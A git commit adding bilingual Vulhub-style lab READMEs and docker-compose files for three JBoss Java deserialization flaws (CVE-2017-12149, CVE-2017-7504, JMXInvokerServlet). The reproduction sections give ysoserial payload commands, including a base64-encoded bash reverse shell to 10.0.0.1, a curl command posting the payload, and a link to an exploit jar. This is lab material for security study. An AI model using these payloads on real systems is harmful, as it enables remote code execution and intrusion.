first commit

jboss/CVE-2017-12149/README.md

@@ -0,0 +1,54 @@
+# JBoss 5.x/6.x Deserialization Remote Code Execution (CVE-2017-12149)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Red Hat JBoss Application Server is a JavaEE-based open source application server. In JBoss AS 5.x/6.x, the ReadOnlyAccessFilter filter in the HttpInvoker component attempts to deserialize data streams from clients without performing any security checks, resulting in a deserialization vulnerability.
+
+References:
+
+ - https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
+ - https://access.redhat.com/security/cve/cve-2017-12149
+
+## Environment Setup
+
+Run the following command to start the JBoss AS 6.1.0:
+
+```
+docker compose up -d
+```
+
+The initial setup will take 1-3 minutes. After initialization is complete, visit `http://your-ip:8080/` to see the JBoss default page.
+
+## Vulnerability Reproduce
+
+The vulnerability exists in the `/invoker/readonly` request, where the server performs Java deserialization on the POST content submitted by users:
+
+![](img/1.png)
+
+Therefore, we can use conventional Java deserialization vulnerability testing methods to reproduce this vulnerability.
+
+### Generate reverse shell payload
+
+We use bash for the reverse shell, but since `Runtime.getRuntime().exec()` cannot use pipe operators and other bash methods directly, we need to encode it first.
+
+Tool: http://www.jackson-t.ca/runtime-exec-payloads.html
+
+![](img/2.png)
+
+### Generate serialized data
+
+We use [ysoserial](https://github.com/frohoff/ysoserial) to generate the serialized data. Since Vulhub uses a newer version of Java, we choose the CommonsCollections5 gadget:
+
+```
+java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
+```
+
+### Send the POC
+
+The generated POC is poc.ser. Simply send this file as the POST Body to /invoker/readonly:
+
+![](img/3.png)
+
+Successfully obtained reverse shell:
+
+![](img/4.png)

jboss/CVE-2017-12149/README.zh-cn.md

@@ -0,0 +1,52 @@
+# JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）
+
+Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 5.x/6.x中，HttpInvoker组件中的ReadOnlyAccessFilter过滤器在未进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。
+
+参考：
+
+ - https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
+ - https://access.redhat.com/security/cve/cve-2017-12149
+
+## 测试环境
+
+执行如下命令启动JBoss AS 6.1.0：
+
+```
+docker compose up -d
+```
+
+首次执行时会有1~3分钟时间初始化，初始化完成后访问`http://your-ip:8080/`即可看到JBoss默认页面。
+
+## 漏洞复现
+
+该漏洞出现在`/invoker/readonly`请求中，服务器将用户提交的POST内容进行了Java反序列化：
+
+![](img/1.png)
+
+所以，我们用常规Java反序列化漏洞测试方法来复现该漏洞。
+
+### 编写反弹shell的命令
+
+我们使用bash来反弹shell，但由于`Runtime.getRuntime().exec()`中不能使用管道符等bash需要的方法，我们需要用进行一次编码。
+
+工具：http://www.jackson-t.ca/runtime-exec-payloads.html
+
+![](img/2.png)
+
+### 序列化数据生成
+
+使用[ysoserial](https://github.com/frohoff/ysoserial)来复现生成序列化数据，由于Vulhub使用的Java版本较新，所以选择使用的gadget是CommonsCollections5：
+
+```
+java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
+```
+
+### 发送POC
+
+生成好的POC即为poc.ser，将这个文件作为POST Body发送至/invoker/readonly即可：
+
+![](img/3.png)
+
+成功反弹shell：
+
+![](img/4.png)

jboss/CVE-2017-12149/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+  jboss:
+    image: vulhub/jboss:as-6.1.0
+    ports:
+      - "9990:9990"
+      - "8080:8080"

jboss/CVE-2017-7504/README.md

@@ -0,0 +1,38 @@
+# JBoss 4.x JBossMQ JMS Deserialization Remote Code Execution (CVE-2017-7504)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Red Hat JBoss Application Server is a JavaEE-based open source application server. In JBoss AS 4.x and earlier versions, there is a deserialization vulnerability in the HTTPServerILServlet.java file of the JMS over HTTP Invocation Layer in JBossMQ implementation. Remote attackers can exploit this vulnerability to execute arbitrary code by using specially crafted serialized data.
+
+References:
+
+- https://github.com/joaomatosf/JavaDeserH2HC
+- https://www.youtube.com/watch?v=jVMr4eeJ2Po
+
+## Environment Setup
+
+Execute the following command to start JBoss AS 4.0.5:
+
+```
+docker compose up -d
+```
+
+After the environment is started, the target will be available at `http://your-ip:8080`.
+
+## Vulnerability Reproduce
+
+This vulnerability exists in the `/jbossmq-httpil/HTTPServerILServlet` request. We can use the CommonsCollections5 exploitation chain from ysoserial to reproduce it. Generate the payload:
+
+```
+java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
+```
+
+Send the content of 1.ser file as POST Body:
+
+```
+curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
+```
+
+![](1.png)
+
+Execute `docker compose exec jboss bash` to enter the container, and you can see that `/tmp/success` has been successfully created.

jboss/CVE-2017-7504/README.zh-cn.md

@@ -0,0 +1,36 @@
+# JBoss 4.x JBossMQ JMS 反序列化漏洞（CVE-2017-7504）
+
+Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
+
+参考：
+
+- https://github.com/joaomatosf/JavaDeserH2HC
+- https://www.youtube.com/watch?v=jVMr4eeJ2Po
+
+## 漏洞环境
+
+执行如下命令启动JBoss AS 4.0.5：
+
+```
+docker compose up -d
+```
+
+环境启动后，目标为`http://your-ip:8080`。
+
+## 漏洞复现
+
+该漏洞出现在`/jbossmq-httpil/HTTPServerILServlet`请求中，我们借助ysoserial的eCommonsCollections5利用链来复现。生成Payload：
+
+```
+java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser
+```
+
+我们将1.ser文件内容作为POST Body发送：
+
+```
+curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
+```
+
+![](1.png)
+
+执行`docker compose exec jboss bash`进入容器，可见`/tmp/success`已成功创建。

jboss/CVE-2017-7504/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+  jboss:
+    image: vulhub/jboss:as-4.0.5
+    ports:
+      - "8080:8080"

jboss/JMXInvokerServlet-deserialization/README.md

@@ -0,0 +1,32 @@
+# JBoss JMXInvokerServlet Deserialization Remote Code Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Red Hat JBoss Application Server is a JavaEE-based open source application server.
+
+This is a classic JBoss deserialization vulnerability where JBoss reads user-supplied objects in the `/invoker/JMXInvokerServlet` request, allowing attackers to execute arbitrary code using Gadgets from Apache Commons Collections.
+
+References:
+
+ - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
+ - https://www.seebug.org/vuldb/ssvid-89723
+ - http://www.freebuf.com/sectool/88908.html
+ - https://paper.seebug.org/312/
+
+## Environment Setup
+
+Execute the following command to start JBoss AS 6.1.0:
+
+```
+docker compose up -d
+```
+
+The initial setup will take 1-3 minutes. After initialization is complete, visit `http://your-ip:8080/` to see the JBoss default page.
+
+## Vulnerability Reproduce
+
+When JBoss processes the `/invoker/JMXInvokerServlet` request, it reads the object directly. Therefore, we can simply attach a POC generated by [ysoserial](https://github.com/frohoff/ysoserial) in the POST Body. The entire process is similar to [jboss/CVE-2017-12149](https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149), so I won't repeat it here.
+
+There are many existing exploits available online. For example, you can use [DeserializeExploit.jar](https://download.vulhub.org/download/deserialization/DeserializeExploit.jar) to directly execute commands and upload files:
+
+![](1.png)

jboss/JMXInvokerServlet-deserialization/README.zh-cn.md

@@ -0,0 +1,28 @@
+# JBoss JMXInvokerServlet 反序列化漏洞
+
+Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。这是经典的JBoss反序列化漏洞，JBoss在`/invoker/JMXInvokerServlet`请求中读取了用户传入的对象，然后我们利用Apache Commons Collections中的Gadget执行任意代码。
+
+参考文档：
+
+ - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
+ - https://www.seebug.org/vuldb/ssvid-89723
+ - http://www.freebuf.com/sectool/88908.html
+ - https://paper.seebug.org/312/
+
+## 漏洞环境
+
+执行如下命令启动JBoss AS 6.1.0：
+
+```
+docker compose up -d
+```
+
+首次执行时会有1~3分钟时间初始化，初始化完成后访问`http://your-ip:8080/`即可看到JBoss默认页面。
+
+## 漏洞复现
+
+JBoss在处理`/invoker/JMXInvokerServlet`请求的时候读取了对象，所以我们直接将[ysoserial](https://github.com/frohoff/ysoserial)生成好的POC附在POST Body中发送即可。整个过程可参考[jboss/CVE-2017-12149](https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149)，我就不再赘述。
+
+网上已经有很多EXP了，比如[DeserializeExploit.jar](https://download.vulhub.org/download/deserialization/DeserializeExploit.jar)，直接用该工具执行命令、上传文件即可：
+
+![](1.png)

jboss/JMXInvokerServlet-deserialization/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+  jboss:
+    image: vulhub/jboss:as-6.1.0
+    ports:
+      - "9990:9990"
+      - "8080:8080"